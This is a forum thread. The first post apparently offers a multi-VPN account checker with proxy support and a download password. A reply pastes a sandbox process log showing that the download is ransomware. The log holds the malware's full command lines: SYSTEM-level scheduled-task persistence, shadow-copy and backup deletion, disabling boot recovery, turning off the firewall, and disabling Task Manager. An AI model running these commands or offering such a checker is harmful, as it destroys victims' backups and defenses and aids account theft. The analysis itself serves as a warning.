+ Jerry56 Posted April 7, 2023 Share Posted April 7, 2023 https://i.imgur.com/WD7XouK.jpg Checking: HMA(PL), goosevpn, vyper, nord, surfshark, safervpn. Proxy type: http\s, socks4, socks4/5, socks5. Password 123Multi VPN Checker by APSOFT Quote Link to comment Share on other sites More sharing options...
+ HailHydra Posted April 24, 2023 Share Posted April 24, 2023 @amd8,@P3rk0c3t,@lashes,@lomo winlogon.exe (PID: 6832 cmdline: "C:\Users\user\Desktop\winlogon.exe" MD5: 8AEA251877CB4F5EE6CF357831F8620C) cmd.exe (PID: 6332 cmdline: "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\user\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) schtasks.exe (PID: 6896 cmdline: schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\user\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F MD5: 15FF7D8324231381BAD48A052F85DF04) csc.exe (PID: 4428 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\genzb5nm\genzb5nm.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA) conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cvtres.exe (PID: 6352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBE.tmp" "c:\ProgramData\CSCAA1ED80841964C04A0A532F2FC31DC6F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA) cmd.exe (PID: 8664 cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 8792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) vssadmin.exe (PID: 8924 cmdline: vssadmin delete shadows /all /quiet MD5: 7E30B94672107D3381A1D175CF18C147) cmd.exe (PID: 8820 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 3088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 3416 cmdline: "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) WMIC.exe (PID: 4400 cmdline: wmic shadowcopy delete MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8) cmd.exe (PID: 956 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 10368 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 10676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 5780 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 9044 cmdline: "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 8996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 4620 cmdline: netsh advfirewall set currentprofile state off MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) cmd.exe (PID: 8960 cmdline: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 8924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 3396 cmdline: netsh firewall set opmode mode=disable MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) winlogon.exe (PID: 10348 cmdline: C:\Users\user\AppData\Roaming\winlogon.exe MD5: 8AEA251877CB4F5EE6CF357831F8620C) cmd.exe (PID: 10140 cmdline: "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Windows\system32\config\systemprofile\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) schtasks.exe (PID: 5760 cmdline: schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Windows\system32\config\systemprofile\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F MD5: 15FF7D8324231381BAD48A052F85DF04) cmd.exe (PID: 488 cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) vssadmin.exe (PID: 3952 cmdline: vssadmin delete shadows /all /quiet MD5: 7E30B94672107D3381A1D175CF18C147) cmd.exe (PID: 6436 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) WMIC.exe (PID: 2352 cmdline: wmic shadowcopy delete MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8) cmd.exe (PID: 2904 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 2328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 3348 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 6132 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 6120 cmdline: "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 7000 cmdline: netsh advfirewall set currentprofile state off MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) cmd.exe (PID: 6932 cmdline: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 3652 cmdline: netsh firewall set opmode mode=disable MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) winlogon.exe (PID: 8528 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe" MD5: 8AEA251877CB4F5EE6CF357831F8620C) winlogon.exe (PID: 5160 cmdline: "C:\ProgramData\winlogon.exe" MD5: 8AEA251877CB4F5EE6CF357831F8620C) winlogon.exe (PID: 5572 cmdline: "C:\ProgramData\winlogon.exe" MD5: 8AEA251877CB4F5EE6CF357831F8620C) cmd.exe (PID: 2252 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F) conhost.exe (PID: 10176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) reg.exe (PID: 4752 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: E3DACF0B31841FA02064B4457D44B357) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.